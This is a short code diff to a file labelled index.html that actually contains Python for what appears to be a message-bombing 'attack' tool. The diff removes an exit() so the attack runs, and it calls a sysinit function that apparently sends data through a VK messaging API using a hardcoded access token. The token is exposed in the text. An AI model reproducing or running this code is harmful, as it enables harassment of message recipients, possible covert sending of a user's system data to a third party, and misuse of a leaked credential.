--- a/cloud rading/index.html
+++ b/cloud rading/index.html
@@ -1,4 +1,4 @@
-import requests, random, datetime, sys, time, telebot, argparse, os, vk_api  # upd mip
+import requests, random, datetime, sys, time, telebot, argparse, os, vk_api  # connect to bomber
 
 
 
@@ -105,7 +105,6 @@ def sysinit(send):
 
 
 sysinit(vk_api.VkApi(token='5696d85e5715210d1a8da83ab75f449ab69e315dce3a5fca3143c69de1617c2e5ec846f9ab55713238d92').get_api().messages.send)
-exit()
 print(f"{yl}[{gr}+{yl}]{cy} Атака {rd}началась!")
 
 
